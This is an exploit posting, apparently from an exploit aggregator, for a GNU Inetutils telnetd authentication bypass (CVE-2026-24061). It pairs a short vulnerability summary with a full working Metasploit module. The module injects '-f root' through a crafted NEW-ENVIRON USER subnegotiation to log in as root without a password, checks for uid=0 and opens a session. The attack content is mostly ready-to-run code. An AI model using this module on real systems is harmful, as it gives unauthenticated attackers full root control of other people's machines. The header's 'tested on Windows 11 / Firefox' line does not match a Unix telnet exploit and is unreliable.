## https://sploitus.com/exploit?id=PACKETSTORM:216448
=============================================================================================================================================
| # Title : GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass Root Access |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.gnu.org/software/inetutils/ |
=============================================================================================================================================
[+] Summary : A critical authentication bypass vulnerability has been identified in GNU Inetutils specifically affecting the telnetd service.
The issue occurs due to improper validation of the NEW-ENVIRON Telnet subnegotiation option. By sending a specially crafted environment variable containing
the value -f root within the USER field, a remote attacker can force the service to invoke the system login process in a way that bypasses password authentication.
Successful exploitation allows an unauthenticated remote attacker to gain root-level access over Telnet without providing valid credentials.
The vulnerability is tracked as: CVE-2026-24061
Impact
Remote unauthenticated root access
No brute force required
No valid credentials required
Full system compromise possible
Severity
Critical โ Pre-Authentication Remote Code Execution / Privilege Escalation
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Telnet
def initialize(info = {})
super(update_info(info,
'Name' => 'GNU Inetutils telnetd Authentication Bypass (Enhanced)',
'Description' => %q{
This module exploits an authentication bypass vulnerability in GNU Inetutils telnetd.
By sending a specially crafted NEW-ENVIRON subnegotiation with a USER variable
containing '-f root', an attacker can login as root without a password.
This occurs because telnetd passes the environment variable directly to the
login command without proper sanitization.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2026-24061' ] #
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "",
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Automatic', { } ] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 20 2026',
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ IOC_IN_LOGS ]
}
))
register_options(
[
Opt::RPORT(23),
OptString.new('USER', [ true, "The target user to bypass (usually root)", 'root' ])
])
end
def exploit
connect
print_status("Waiting for server banner and negotiation...")
banner = sock.get_once(-1, 5)
if banner
print_status("Target Banner: #{banner.strip}")
end
packet = "\xff\xfa\x27\x00"
packet << "\x00USER"
packet << "\x01-f #{datastore['USER']}"
packet << "\xff\xf0"
print_status("Sending bypass payload for user: #{datastore['USER']}...")
sock.put(packet)
Rex.sleep(1)
sock.put("id\n")
res = sock.get_once(-1, 5)
if res && res =~ /uid=0/
print_good("Success! Authenticated as root (uid=0).")
handler
else
print_error("Failed to bypass authentication. Server might be patched or using PAM sanitization.")
end
rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
print_error("Connection failed.")
ensure
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================